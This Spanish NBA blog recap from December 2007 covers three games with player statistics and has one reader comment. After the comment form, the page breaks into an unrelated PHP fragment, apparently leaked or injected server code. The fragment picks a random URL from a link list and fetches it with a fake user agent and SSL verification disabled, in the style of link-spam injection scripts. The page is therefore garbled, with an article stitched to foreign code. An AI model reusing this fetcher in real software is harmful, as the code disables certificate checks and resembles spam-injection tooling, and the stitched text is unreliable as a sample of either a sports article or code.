La crónica (6/12/07)

07 de December de 2007 por Jabho

Noche relativamente tranquila en la NBA con sólo 3 partidos pero que han aportado nuevos datos que permiten obtener más conclusiones. Conclusión 1: Los de Minnesota no son un equipo, son una banda. Conclusión 2: Los Heat están profundamente tocados, con y sin Wade y es difícil que salgan del pozo en el que están. Conclusión 3: Allen Iverson es un gran jugador, que además está a tope físicamente y que es capaz de aportar mucho todavía.



Hawks 90 – 89 Wolves

Definitivamente, los Wolves han olvidado cómo se ganan los partidos. Y no es que anoche no lo intentasen ante los Hawks, que para imponerse necesitaron una canasta sobre la bocina de Joe Johnson, autor de 21 puntos, 9 rebotes y 4 asistencias. La ventaja cambió de manos 5 veces en los últimos 45 segundos. Jaric, el mejor de los Wolves con 18 puntos, 8 rebotes y 9 asistencias, puso a los suyos por delante a dos segundos y medio para el final, pero tras el tiempo muerto, Johnson anotó para poner a los Hawks con 8-10 e inflingir a los Wolves su 22ª derrota en 24 partidos. El mejor del partido fue Josh Smith, con 28 puntos, 7 rebotes, 7 tapones, 2 asistencias y 2 robos. Marvin Williams logró 20 puntos para los de Georgia mientras que en los Wolves también destacó Craig Smith con 20 puntos y 9 rebotes, y Jefferson, con 17-8.

Heat 106 – TrailBlazers 112

La soledad de Dwayne Wade debe de ser infinita. Debe ser difícil de llevar el estar a punto de hacer un triple doble con 21 puntos, 10 rebotes y 9 asistencias y sin embargo perder el partido. Pero los Heat son así. Un equipo que, a día de hoy, no es capaz de ganar a nadie, con una rotación mínima y con hombres evidentemente cuesta abajo. Con un O’Neal que jugó sólo 22 minutos por problemas de faltas y que sólo consiguió 8 puntos y 10 rebotes. Incluso Wade, aunque rozase el triple, no hizo un buen partido, ya que su acierto en el tiro fué mínimo. Un 9 de 26, todos tiros de 2 puntos, no son lo que se llama un buen día. Y delante de Miami los Trailblazers, que consiguieron acumular una renta de 16 puntos al principio del tercer cuarto, pero que se dejaron prácticamente igualar tras un pequeño arreón de Cook, Wade y Ricky Davis. En los momentos finales Portland fue capaz de mantener el tipo gracias en parte al escudero de lujo que ha encontrado en los últimos días en Travis Outlaw. 20 puntos y 7 rebotes, más los 21 y 7 del partido anterior contra Memphis en el que metió la canasta decisiva son un buen bagaje para este jugador de 4º año que no había destacado especialmente. Junto a él los de siempre. Brandon Roy con 25 puntos, 5 rebotes y 6 asistencias y Aldridge con 14 puntos y 14 rebotes.

Nuggets 122 – 109 Mavs

86 puntos con 30 de 46 en tiros y 20 asistencias en 90 minutos de juego disputados en un plazo de 24 horas… no está nada mal para un tipo de 32 años. Allen Iverson llevó a su equipo ayer a la victoria en pista de los Mavs con 35 puntos y 12 asistencias apenas 24 horas después de obtener 51 puntos en la derrota de los Nuggets frente a los Lakers. El mejor aliado de AI fue Kleiza, que aprovechó las asistencias de Iverson para anotar 23 puntos, los mismos que un Anthony muy desacertado (9 de 30 en tiros de campo, 5 de 9 en libres). Kenyon Martin añadió 18 y 7 rebotes y Camby, 8 puntos, 14 rebotes y 5 tapones. Para los Mavs, que se quedan con un balance de 12-8 tras perder 6 de los últimos 9 partidos disputados, Nowitzki fue el mejor con 32 puntos, 12 rebotes y 5 asistencias. Stackhouse brilló con 23-7-5 y buenos porcentajes pero Harris, Howard y Terry ayudaron poco a su equipo al acumular un pobre 12 de 37 en tiros.

 

 

 

Comenta

Un comentario a esta entrada

  1. Dantley dice:
    #1

    Aún no hemos discutido de Iverson aquí. Lo dejamos para otro momento ….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>